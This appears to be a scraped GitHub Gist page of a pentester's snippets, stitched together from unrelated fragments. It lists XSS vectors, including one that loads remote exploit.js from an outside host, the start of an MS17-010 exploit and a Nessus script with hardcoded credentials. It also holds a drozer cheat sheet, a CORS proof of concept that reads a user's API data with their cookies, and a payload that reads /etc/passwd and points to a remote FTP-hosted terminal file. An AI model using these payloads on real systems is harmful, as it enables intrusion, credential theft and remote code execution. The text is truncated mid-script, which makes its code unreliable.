Skip to content

Instantly share code, notes, and snippets.

@nani1337
nani1337 / 666_lines_of_XSS_vectors.html
Created March 23, 2017 09:57 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
//usage Nessus_automation.py 10.20.20.20/24
#!/usr/bin/python
import requests
import json
import time
import sys
import os
from subprocess import *
cmd = "curl -s -k -X POST -H \"Content-Type: application/json\" -d \"{\\\"username\\\": \\\"admin\\\", \\\"password\\\": \\\"@1\\\"}\" https://site.com:8834/session"
#!/usr/bin/python
from impacket import smb, smbconnection
from mysmb import MYSMB
from struct import pack, unpack, unpack_from
import sys
import socket
import time
'''
MS17-010 exploit for Windows 7+ by sleepya
#!/usr/bin/python
import sys, copy
###########################
######## FUNCTIONS ########
###########################
def check_arg():
scan = ness6rest.Scanner(url="https://site:8834", login="admin",
password="Welcome@1", insecure=True)
scan.upload(upload_file="nessus_policy_NavVA.nessus")
scan._policy_add_audit(category="linux",name="NavVa")
scan.policy_add(name="NavVa", plugins="21156")
scan.scan_add(targets="10.249.25.156")
<img src="/" =_="
title="onerror='var/**/w=window.top.document;var/**/x=w.createElement("script");x.type="text/javascript";x.src="https://doom.fredrik-almroth.se/exploit.js";w.getElementsByTagName("head")[0].appendChild(x);window.top.history.pushState("","","/doom.exe");'">
@nani1337
nani1337 / AndroidesecPt.html
Last active April 7, 2023 17:11
Android-cheat sheet
starting a drozer session
$ adb forward tcp:31415 tcp:31415
connecting a drozer
$ drozer console connect
Retrieving Package Information
<html>
<script>
var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://site.com/api/rest/1.2/users/12056e2fcdfb3a73d9674351f107bf5a/projects?_=1496248656402',true); req.withCredentials = true; req.send('{}'); function reqListener() { alert(this.responseText); };
</script>
</html>
2nd poc
javascript://comment
location.href="ftp://anonymous:x@104.131.88.251/";
window.setTimeout(function(){location.href="file:///Volumes/104.131.88.251/hack.terminal";},5000)
javascript://comment[\r\n]
r=new XMLHttpRequest();
r.open('GET','file:///etc/passwd',false);
r.send(null);
document.getElementById('chat_text').innerHTML=r.responseText;